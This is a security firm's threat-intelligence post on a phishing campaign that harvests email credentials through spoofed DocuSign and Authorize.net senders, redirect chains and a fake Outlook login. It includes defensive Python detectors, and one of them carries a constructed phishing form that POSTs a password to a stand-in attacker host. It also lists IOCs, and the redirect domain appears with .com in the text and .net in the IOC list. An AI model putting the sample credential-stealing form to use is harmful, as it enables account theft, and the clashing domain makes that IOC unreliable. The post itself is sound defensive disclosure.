Cyberuptive Identifies and Disrupts Ferest Smuggler — A Mass Credential Harvesting Campaign
As more and more organizations secure their enterprises with multi-factor authentication (MFA), adversaries scale and automate to more efficiently harvest — and then exploit — the passwords of those organizations without MFA.
One of those scaled credential harvesting campaigns that Cyberuptive discovered, and then disrupted, is what we call Ferest Smuggler. Email account credentials are a means to an end, and in this case Cyberuptive has high confidence that Ferest Smuggler’s ultimate purpose is business email compromise (BEC)-leveraged wire fraud¹.
Cyberuptive identified key infrastructure of this malicious campaign, including a QuickBooks add-on developer whose server infrastructure was compromised and used to host the fake login pages and credential-stealing code. We contacted that company, which then ejected the adversary and their code, stopping the campaign in its tracks. We also shared indicators with a large email cybersecurity service. We are publishing the information in this post to bring attention to this campaign, so others can better detect the next one. We also hope to impose a significant cost on the adversary in their efforts to retool and rebuild their infrastructure.
Let’s dig into screenshots of what Ferest Smuggler malicious emails look like when they arrive in a target’s inbox. Our first example targeted a Midwest US non-profit (Figure 1) in early July 2023.
The attachment is a hypertext markup language (HTML) file with a .htm extension, named using the target email domain, some random numbers, and the email user (in this case hrd — short for human resources department). “See attached as discussed previously” is the minimal body text that suffices for social engineering. Note the purported sender domain “maildev.docusign.net.”
A second example phishing email targeted a live entertainment company in the United Kingdom a few weeks later (Figure 2).
Again, some minimal, and here grammatically questionable, social engineering text: “See attached as per what we discussed on this last month.” Note the purported sender domain “stage.partner.docusign.net.”
While docusign.net is a legitimate domain associated with the well-known electronic agreement company, the secondary domain label maildev and the tertiary domain label stage.partner used in the two email examples were likely crafted or chosen by the adversary for a reason. They may certainly appear valid to the recipient. These subdomains, though purporting to be associated with the real Docusign, do not currently resolve to authenticated mail exchange (MX) records that would otherwise tell receiving email servers that they are legitimate email domains for Docusign. However, due in part to industry accommodations for exceptions and errors in MX authentication configurations, spoofed sender domains such as these, with null MX records, are significantly more likely to pass through email filters than spoofed senders purporting to be from domains (such as the primary domain docusign.net) with valid, authenticated MX records.
Cyberuptive also observed the following Ferest Smuggler phishing email that targeted a US West Coast city government in August 2023. This email spoofed the Visa-owned payment processor Authorize.net, successfully bypassing email filtering using a domain with null MX records:
From: Auto-Receipt <redacted> <transactionshKCz6RrfM@invoice.authorize\.net>
Date: August 1, 2023 at 8:58:17 PM PDT
To: <Re Dacted><redacted@redacted.org>
Subject: Transaction Receipt for $35,000.00 (USD)
Reply-To: unsubscribe@993629.cox\.net [fake]
Attachment filename: <Redacted>_Receipt_#649846.docx.htm
SHA256: afa7e192bf8ecfa51aa014b88f1abdb1cc249da7014ea662c73ec73297843f89
Attachment filetype: text/html
We assess that the adversary has likely used this technique to achieve more success than in their previous credential stealing campaigns. The nearly 400 Ferest Smuggler email attachments Cyberuptive observed in our investigation are evidence that this sub-domain technique is fairly effective in bypassing popular email spoofing filter technologies.
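As an added illustration of the null-MX sender pattern described above (this is example code written for this post, not Cyberuptive's own tooling), the following Python check extracts the domain from a From: header, looks up whether that domain has any MX record, and notes when it is a previously unseen sub-domain of a watched brand. The MX table, the watched-brand list, and the sample headers are constructed for the example; a real deployment would replace fake_mx_lookup with a live resolver call.

```python
import email.utils

# Constructed stand-in for DNS (not a live lookup): domain -> MX hosts.
# A real implementation would query MX records, e.g. with dnspython's
# dns.resolver.resolve(domain, "MX"). The sub-domains used in the campaign
# deliberately have no entry here, mirroring their null MX records.
FAKE_MX_TABLE = {
    "docusign.net": ["mx.docusign.net."],
    "authorize.net": ["mx.authorize.net."],
    "example.org": ["mx.example.org."],
}

# Hypothetical list of brands this filter watches for look-alike sub-domains.
WATCHED_BRANDS = ("docusign.net", "authorize.net")


def fake_mx_lookup(domain):
    """Return the MX hosts for a domain from the constructed table (empty = null MX)."""
    return FAKE_MX_TABLE.get(domain.lower(), [])


def sender_domain(from_header):
    """Domain part of the address in a From: header, or None if it cannot be parsed."""
    _, addr = email.utils.parseaddr(from_header)
    if "@" not in addr:
        return None
    return addr.rsplit("@", 1)[1].strip(".").lower()


def assess_sender(from_header, mx_lookup=fake_mx_lookup, brands=WATCHED_BRANDS):
    """Classify one From: header.

    Returns the sender domain, whether it has MX records, the watched brand it
    is a sub-domain of (if any), and the reasons to hold the message for review.
    """
    domain = sender_domain(from_header)
    verdict = {"domain": domain, "has_mx": False, "brand": None, "reasons": []}
    if domain is None:
        verdict["reasons"].append("unparsable-sender")
        return verdict
    verdict["has_mx"] = bool(mx_lookup(domain))
    for brand in brands:
        if domain != brand and domain.endswith("." + brand):
            verdict["brand"] = brand
    if not verdict["has_mx"]:
        # The pattern seen in this campaign: a sub-domain of a real brand that
        # has no MX records of its own.
        verdict["reasons"].append("null-mx-sender")
        if verdict["brand"]:
            verdict["reasons"].append("null-mx-subdomain-of-" + verdict["brand"])
    return verdict


if __name__ == "__main__":
    # Constructed header modelled on the Authorize.net example above.
    for hdr in ("Auto-Receipt <transactionshKCz6RrfM@invoice.authorize.net>",
                "Docusign <noreply@docusign.net>",
                "Alice <alice@example.org>"):
        print(assess_sender(hdr))
```

The check is deliberately narrow: it only answers "does this sender domain exist as a mail domain at all?" In a real filter it would sit beside the message's SPF and DMARC results rather than replace them, and the reasons list gives an analyst the specific hold condition rather than a bare score.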
Ferest Smuggler Abuses Podcast Site and QuickBooks Add-On Developer Servers
Cyberuptive performed dynamic analysis on a large number of Ferest Smuggler email attachments and identified infrastructure used by the Ferest Smuggler adversaries to steal credentials. Although the infrastructure varied among phishing waves between June and August 2023, the very first attachment we analyzed shows infrastructure typical of Ferest Smuggler. This attachment targeted a medium-sized engineering and architectural firm. The top of Figure 3 shows the initial abuse of an open redirect vulnerability on the legitimate website podcastone.com, and annotations show the redirect targets.
Next, the victim’s browser was redirected to a URL hosted by the free URL shortener site rb.gy, which in turn redirected to yet another free URL shortener at alturl.com (Figure 4).
The alturl.com URL redirected to a URL served by the popular social media site LinkedIn’s own URL shortener, lnkd.in (Figure 5).
The LinkedIn short URL redirected to a site hosted on a server in Iran, vip28sh.mizbanfadns\.com (Figure 6).
Finally, the last redirect from the site hosted in Iran lands the target’s browser on infrastructure compromised and abused by the adversary to deliver a fake Outlook/Office 365 email login page (Figure 7).
When the victim types their password in the fake Outlook login page, the credentials are POSTed (uploaded) to the adversary’s phishing page “owa.php” (Figure 8).
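As an added example of how a defender can triage attachments like this one statically before any browser runs them (example code written for this post, not Cyberuptive's analysis tooling), the following Python script checks the traits described above: the document-extension-plus-.htm filename, a password form, a form action that POSTs credentials to a remote .php endpoint such as owa.php, and script redirects to the URL shorteners used in the chain. The shortener watch-list, the host phish-host.example and the sample attachment are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Filename pattern from the campaign: a document extension followed by .htm/.html
DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pdf)\.html?$", re.IGNORECASE)
# Hypothetical watch-list of shortener hosts; the chain above used these three.
REDIRECT_HOSTS = {"rb.gy", "alturl.com", "lnkd.in"}
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class _AttachmentScanner(HTMLParser):
    """Collects form actions, password inputs, and URLs found in script bodies."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.has_password_field = False
        self.script_urls = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password_field = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data as raw text.
        if self._in_script:
            self.script_urls.extend(URL_RE.findall(data))


def triage_attachment(filename, html):
    """Return findings for one HTML attachment; an empty list means nothing matched."""
    scanner = _AttachmentScanner()
    scanner.feed(html)
    findings = set()
    if DOUBLE_EXT.search(filename):
        findings.add("double-extension-filename")
    if scanner.has_password_field:
        findings.add("password-form")
    for action in scanner.form_actions:
        parsed = urlparse(action)
        # Credentials leaving the attachment for a remote .php endpoint, as with owa.php.
        if parsed.hostname and parsed.path.lower().endswith(".php"):
            findings.add("external-php-post")
    for url in scanner.script_urls + scanner.form_actions:
        host = (urlparse(url).hostname or "").lower()
        if host in REDIRECT_HOSTS:
            findings.add("redirect-host")
    return {"filename": filename, "post_targets": scanner.form_actions,
            "findings": sorted(findings)}


# Constructed sample attachment (not a real capture) that exercises every check.
SAMPLE_FILENAME = "REDACTED_Receipt_#649846.docx.htm"
SAMPLE_HTML = """<html><body>
<script>window.location.href = "https://rb.gy/CONSTRUCTED";</script>
<form method="POST" action="https://phish-host.example/owa.php">
  <input type="email" name="login" value="target@example.org">
  <input type="password" name="passwd">
</form>
</body></html>"""

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_FILENAME, SAMPLE_HTML))
```

Each finding is a separate string so that a mail gateway or SOAR rule can weight them independently; a password form on its own is common in legitimate HTML, but a password form whose action is a remote .php URL inside an attachment named *.docx.htm is the combination this campaign relied on.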
The victim company hosting Ferest Smuggler’s phishing pages develops QuickBooks add-ons for their customers using custom-named virtual servers. Cyberuptive identified approximately a dozen customer virtual servers with malicious code that was used over a period of several months to steal credentials. The QuickBooks add-on developer expressed that they were not aware of the identified malicious credential stealing files prior to contact by Cyberuptive. The senior web developer rapidly located and removed the malicious files and assured Cyberuptive that the intrusion vector the adversary used to initially compromise their infrastructure was remediated. Cyberuptive confirmed the previously identified malcode was removed as of 15 August 2023. Prior to remediation, Cyberuptive screen recorded our dynamic analysis of one of Ferest Smuggler’s phishing attachments, redacted where necessary to protect the identity of the target recipient (Figure 9).
Why Ferest Smuggler?
Ferest means “to send” in Persian, and is a fitting name for infrastructure that sends its target from one site to another, smuggled inside an HTML attachment. However, Cyberuptive assesses that Ferest Smuggler uses infrastructure in Iran only because Iran represents a hurdle for takedown efforts by Ferest Smuggler’s principal targets in Western nations.
Some of the code analyzed by Cyberuptive suggests association with Nigeria. For example, the Ferest Smuggler phishing code uses the words “salewa” and “asaro” (Figure 10).
Salewa is the name of a village in the northwest Sokoto region of Nigeria. Asaro is the name for a type of yam porridge that is a staple cuisine in Nigeria.
While hunting for some of the unique strings found in Ferest Smuggler’s .htm attachments on VirusTotal, Cyberuptive identified a number of .htm files with placeholder target email addresses. In hundreds of other Ferest Smuggler .htm files, the target email address is clearly specified, yet these attachments were different (Figure 11).
So from where were those apparent test Ferest Smuggler files uploaded to VirusTotal? Let’s save that for another post where we plan to go into more details on the developer behind Ferest Smuggler’s “zero-detection” phishing attachment.
Don’t hesitate to contact Cyberuptive for more indicators of compromise, Yara signatures, and a list of hashes of hundreds of zero-detection phishing attachments attributed to Ferest Smuggler (Figure 12).
Mitigations
There are multiple mitigations for credential phishing in campaigns like Ferest Smuggler. MFA goes almost without saying; however, MFA (especially simple push) can and will eventually be defeated by determined adversaries using, say, social engineering or push-fatigue techniques. Cyberuptive recommends strengthening MFA with number matching.
- Employ and enforce MFA with number matching.
- Employ perimeter-based URL or DNS-based categorization filtering technologies.
- Consider implementing zero trust architecture (ZTA) with controls and regimes commensurate with your organization’s risk tolerance. Cyberuptive recommends CloudFlare’s ZTA platform because of its performance and scaffolded approach.
Indicators of Compromise (IOCs)
Ferest Smuggler email relays:
122.17.145\.111
122.17.145\.113
Final redirect site:
vip28sh.mizbanfadns\.net
[1] An email address and a password unprotected by MFA are all it takes for a business email compromise (BEC) fraudster, AKA BECster, to collect all the email from a staffer’s Microsoft 365 inbox. If that stolen inbox belongs to a staffer in the accounting or human resources (HR) department, the BECster now has a large number of targets to choose from, all extracted from entities the BECster finds in the stolen email. The BECster can pretend to be the accounts receivable department of the original victim organization and target each client, company, or partner identified in that stolen corpus of email that would normally wire money to the original victim organization. And in the case of an HR staffer compromise, the BECster can pretend to be an employee wishing to change their payroll direct deposit, or even socially engineer a bank into a wire diversion.